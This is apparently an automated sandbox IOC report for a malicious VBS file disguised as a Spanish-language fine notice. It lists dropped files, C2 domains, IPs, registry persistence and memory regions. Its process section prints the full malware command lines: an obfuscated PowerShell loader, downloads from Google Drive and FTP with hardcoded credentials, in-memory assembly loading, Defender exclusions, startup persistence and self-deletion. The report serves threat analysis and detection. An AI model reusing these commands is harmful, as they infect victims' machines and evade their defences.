IOC Report
Oficio notificacion multas y sanciones.vbs

loading gif

Files

File Path
Type
Category
Malicious
Oficio notificacion multas y sanciones.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1
Unicode text, UTF-16, little-endian text, with very long lines (32656)
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1
ASCII text, with very long lines (337), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2yfh01gy.ai5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tztvill.0jl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxgckrry.o3r.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2w31zvg.f1g.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcu2olee.gyi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4dzadck.eq4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egqs2cvs.fio.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esimclt3.okc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gv02y0bp.y5b.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3laic2k.a2s.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2xvaybo.sc4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lukmjau4.e1u.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nafty4e2.uoa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nepsepwb.bqm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooy0ctyb.fre.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opweeao4.b1e.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pginevyz.koj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcyk52g3.3bj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rk3gefbd.wmb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqmp5iao.ojc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF6da1db.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF6dc188.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MVMAZEKE6YQ4XTFMMU7S.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P32ZI24FW5IL27D26J50.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UHT44YAMZRAENXN1K5VR.temp
data
dropped
There are 21 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c???BK???Dg???Nw???1???DE???MgBv???HI???c???By???GU???c???Bv???Gw???ZQB2???GU???Z??????n???Cw???KQ???p???Dk???N??????s???DY???MQ???x???Cw???Nw???5???Cw???N??????x???DE???L??????4???Dk???L??????4???DE???MQ???s???Dc???M??????x???Cw???OQ???5???Cw???NQ???x???DE???L??????x???D??????MQ???s???D??????M??????x???Cg???XQBd???Fs???cgBh???Gg???YwBb???C??????bgBp???G8???ag???t???Cg???K???Bs???GE???aQB0???G4???ZQBk???GU???cgBD???Gs???cgBv???Hc???d???Bl???E4???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???C??????d???Bj???GU???agBi???G8???LQB3???GU???bg???g???D0???I???Bz???Gw???YQBp???HQ???bgBl???GQ???ZQBy???EM???LgB6???HQ???e???Bo???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???OwBn???FM???egBD???EI???b??????k???Ds???Mg???x???HM???b???BU???Do???OgBd???GU???c???B5???FQ???b???Bv???GM???bwB0???G8???cgBQ???Hk???d???Bp???HI???dQBj???GU???Uw???u???HQ???ZQBO???C4???bQBl???HQ???cwB5???FM???Ww???g???D0???I???Bs???G8???YwBv???HQ???bwBy???F??????eQB0???Gk???cgB1???GM???ZQBT???Do???OgBd???HI???ZQBn???GE???bgBh???E0???d???Bu???Gk???bwBQ???GU???YwBp???HY???cgBl???FM???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???Fs???OwB9???GU???dQBy???HQ???J???B7???C??????PQ???g???Gs???YwBh???GI???b???Bs???GE???QwBu???G8???aQB0???GE???Z???Bp???Gw???YQBW???GU???d???Bh???GM???aQBm???Gk???d???By???GU???QwBy???GU???dgBy???GU???Uw???6???Do???XQBy???GU???ZwBh???G4???YQBN???HQ???bgBp???G8???U???Bl???GM???aQB2???HI???ZQBT???C4???d???Bl???E4???LgBt???GU???d???Bz???Hk???UwBb???Hs???I???Bl???HM???b???Bl???H0???I???Bm???C8???I??????w???C??????d??????v???C??????cg???v???C??????ZQB4???GU???LgBu???Hc???bwBk???HQ???dQBo???HM???I??????7???Cc???M??????4???DE???I???Bw???GU???ZQBs???HM???Jw???g???GQ???bgBh???G0???bQBv???GM???LQ???g???GU???e???Bl???C4???b???Bs???GU???a???Bz???HI???ZQB3???G8???c??????7???C??????ZQBj???HI???bwBm???C0???I??????p???C??????JwBw???HU???d???By???GE???d???BT???Fw???cwBt???GE???cgBn???G8???cgBQ???Fw???dQBu???GU???TQ???g???HQ???cgBh???HQ???UwBc???HM???dwBv???GQ???bgBp???Fc???X???B0???GY???bwBz???G8???cgBj???Gk???TQBc???Gc???bgBp???G0???YQBv???FI???X???Bh???HQ???YQBE???H??????c???BB???Fw???Jw???g???Cs???I???Ba???Es???bgBZ???E0???J??????g???Cg???I???Bu???G8???aQB0???GE???bgBp???HQ???cwBl???EQ???LQ???g???Cc???JQBJ???Gg???cQBS???Fg???JQ???n???C??????bQBl???HQ???SQ???t???Hk???c???Bv???EM???I??????7???C??????d???By???GE???d???Bz???GU???cgBv???G4???Lw???g???HQ???ZQBp???HU???cQ???v???C??????RwBj???Fc???aQBS???C??????ZQB4???GU???LgBh???HM???dQB3???C??????ZQB4???GU???LgBs???Gw???ZQBo???HM???cgBl???Hc???bwBw???C??????Ow???p???Cc???dQBz???G0???LgBu???Gk???dwBw???FU???X??????n???C??????Kw???g???E4???SgBU???Hg???R??????k???Cg???I??????9???C??????RwBj???Fc???aQBS???Ds???KQ???g???GU???bQBh???E4???cgBl???HM???VQ???6???Do???XQB0???G4???ZQBt???G4???bwBy???Gk???dgBu???EU???Ww???g???Cs???I??????n???Fw???cwBy???GU???cwBV???Fw???OgBD???Cc???K??????g???D0???I???Ba???Es???bgBZ???E0???J??????7???Ck???JwB1???HM???bQ???u???G4???aQB3???H??????VQBc???Cc???I??????r???C??????TgBK???FQ???e???BE???CQ???I??????s???EI???SwBM???FI???VQ???k???Cg???ZQBs???Gk???RgBk???GE???bwBs???G4???dwBv???EQ???LgBu???Eo???eQBW???Go???J??????7???Dg???RgBU???FU???Og???6???F0???ZwBu???Gk???Z???Bv???GM???bgBF???C4???d???B4???GU???V??????u???G0???ZQB0???HM???eQBT???Fs???I??????9???C??????ZwBu???Gk???Z???Bv???GM???bgBF???C4???bgBK???Hk???VgBq???CQ???Ow???p???HQ???bgBl???Gk???b???BD???GI???ZQBX???C4???d???Bl???E4???I???B0???GM???ZQBq???GI???Tw???t???Hc???ZQBO???Cg???I??????9???C??????bgBK???Hk???VgBq???CQ???OwB9???Ds???I??????p???Cc???d???BP???Ew???YwBf???Es???YQ???z???Fo???ZgBv???Fg???MgBK???Eo???cgBW???Gg???bQBW???Dk???YwBt???Dk???W???Bz???HU???W???Bt???Go???MQBn???DE???Jw???g???Cs???I???Bv???Hg???SwBV???Gc???J??????o???C??????PQ???g???G8???e???BL???FU???Zw???k???Hs???I???Bl???HM???b???Bl???H0???Ow???g???Ck???Jw???y???DQ???dQBY???Eo???V???Bx???GE???bQBn???Hk???TQB0???EY???egBh???Gs???U???BS???DE???cQBf???Ek???dgBH???Gk???W???BO???GQ???cQBh???E4???MQ???n???C??????Kw???g???G8???e???BL???FU???Zw???k???CgAIAA9ACAAbwB4AEsAVQBnACQAewAgACkAIAB1AE4AQwBWAHEAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHUATgBDAFYAcQAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABvAHgASwBV???GcAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABOAEoAVAB4AEQAJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAATgBKAFQAeABEACQAewAgACkAIABQAGIAbgBFAFoAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABQAGIAbgBFAFoAJAAgADsA';$kahlN = $qKKzc.replace('???' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs');powershell $vQpeD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 14 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://pastecodeapp.vercel.app
unknown
https://pastecodeapp.vXB
unknown
https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/rawP
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://ftp.desckvbrat.com.br
unknown
https://go.micro
unknown
http://desckvbrat.com.br
unknown
https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw
76.76.21.22
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw
76.76.21.22
https://aka.ms/pscore6
unknown
https://pastebin.com/raw/pQQ0n3eA
104.20.4.235
https://github.com/Pester/Pester
unknown
https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/rawP
unknown
https://pastecodeapp.vX
unknown
https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/rawP
unknown
https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw
76.76.21.22
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://aka.ms/pscore68
unknown
http://pastecodeapp.vercel.app
unknown
https://firebasestorage.googleh
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://pastebin.com
unknown
https://pastebin.com
unknown
http://crl.mdHy
unknown
https://oneget.org
unknown
There are 26 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
desckvbrat.com.br
191.252.83.213
malicious
pastebin.com
104.20.4.235
malicious
notificadoresrma.duckdns.org
46.246.14.5
malicious
ftp.desckvbrat.com.br
unknown
malicious
pastecodeapp.vercel.app
76.76.21.22

IPs

IP
Domain
Country
Malicious
46.246.14.5
notificadoresrma.duckdns.org
Sweden
malicious
104.20.4.235
pastebin.com
United States
malicious
191.252.83.213
desckvbrat.com.br
Brazil
malicious
76.76.21.22
pastecodeapp.vercel.app
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Update Drivers NVIDEO_nyj
malicious
HKEY_CURRENT_USER
di
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\a388ab2ca3be4
[kl]
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2891000
trusted library allocation
page read and write
malicious
20959177000
trusted library allocation
page read and write
malicious
2078FC86000
trusted library allocation
page read and write
malicious
20A2AA0C000
trusted library allocation
page read and write
malicious
2078FFB6000
trusted library allocation
page read and write
malicious
20958E27000
trusted library allocation
page read and write
malicious
1F542643000
trusted library allocation
page read and write
malicious
20A2A709000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
E2B70FB000
stack
page read and write
7FF848E10000
trusted library allocation
page read and write
7FF848DB0000
trusted library allocation
page read and write
20959130000
trusted library allocation
page read and write
256B8025000
heap
page read and write
5770000
trusted library allocation
page read and write
209708AB000
heap
page read and write
1EBC1CC8000
heap
page read and write
1F5408BD000
heap
page read and write
7FF848D90000
trusted library allocation
page read and write
7FF848F70000
trusted library allocation
page execute and read and write
DD1000
heap
page read and write
4EF0000
trusted library allocation
page read and write
1EBC1CF4000
heap
page read and write
256B7E80000
heap
page read and write
209589BA000
trusted library allocation
page read and write
922BBFF000
stack
page read and write
20A2A689000
trusted library allocation
page read and write
B87E63E000
stack
page read and write
20A28397000
heap
page read and write
513E000
stack
page read and write
1EBC1AA1000
heap
page read and write
7FF848E1C000
trusted library allocation
page read and write
7FF848D2A000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
7FF848D80000
trusted library allocation
page read and write
1563000
heap
page read and write
1EBC1FD4000
heap
page read and write
5766000
trusted library allocation
page read and write
20970960000
heap
page read and write
7FF848B8B000
trusted library allocation
page read and write
20A2A19A000
trusted library allocation
page read and write
152B000
trusted library allocation
page execute and read and write
2569DC60000
heap
page read and write
20958DFA000
trusted library allocation
page read and write
BD571AF000
stack
page read and write
20958510000
heap
page readonly
1EBBFA70000
heap
page read and write
2569F909000
heap
page read and write
20A28464000
heap
page read and write
2569DC80000
heap
page read and write
1E2EDDA0000
heap
page read and write
E2B6685000
stack
page read and write
7FF848EA0000
trusted library allocation
page read and write
256A0B21000
trusted library allocation
page read and write
CD0000
heap
page execute and read and write
2078FC01000
trusted library allocation
page read and write
1E2D5C9B000
trusted library allocation
page read and write
2078D82B000
heap
page read and write
7FF848C56000
trusted library allocation
page execute and read and write
20A283D8000
heap
page read and write
922BFBE000
stack
page read and write
1EBC1B83000
heap
page read and write
2569F996000
heap
page read and write
6130000
heap
page read and write
1D394985000
trusted library allocation
page read and write
2569F8D0000
trusted library allocation
page read and write
209567D3000
heap
page read and write
7FF848E50000
trusted library allocation
page read and write
7A107E000
stack
page read and write
922BA7E000
stack
page read and write
20959141000
trusted library allocation
page read and write
922BCFD000
stack
page read and write
7FF848BE0000
trusted library allocation
page read and write
1F552728000
trusted library allocation
page read and write
B87E27D000
stack
page read and write
20968949000
trusted library allocation
page read and write
20958DB6000
trusted library allocation
page read and write
14F3000
trusted library allocation
page execute and read and write
1F5422E0000
trusted library allocation
page read and write
1EBBFD3E000
heap
page read and write
7FF848D50000
trusted library allocation
page execute and read and write
1D3A2E42000
trusted library allocation
page read and write
1D3911A0000
heap
page read and write
20A2A588000
trusted library allocation
page read and write
7FF848BEC000
trusted library allocation
page execute and read and write
1EBC1FC7000
heap
page read and write
1D3A2E4A000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page read and write
207A7832000
heap
page read and write
7FF848EC4000
trusted library allocation
page read and write
DAB000
heap
page read and write
F01097E000
stack
page read and write
20958E0D000
trusted library allocation
page read and write
20F53E2E000
heap
page read and write
207A77B0000
heap
page read and write
1F543D71000
trusted library allocation
page read and write
2078F6B1000
trusted library allocation
page read and write
1EBC1B2C000
heap
page read and write
2CEB000
heap
page read and write
1E2D58A5000
trusted library allocation
page read and write
DBE44FE000
stack
page read and write
F0106FF000
stack
page read and write
7FF848D80000
trusted library allocation
page read and write
209566D0000
heap
page read and write
2079F74C000
trusted library allocation
page read and write
20970861000
heap
page read and write
1EBBFC7A000
heap
page read and write
7FF848D52000
trusted library allocation
page read and write
1E2D5090000
heap
page read and write
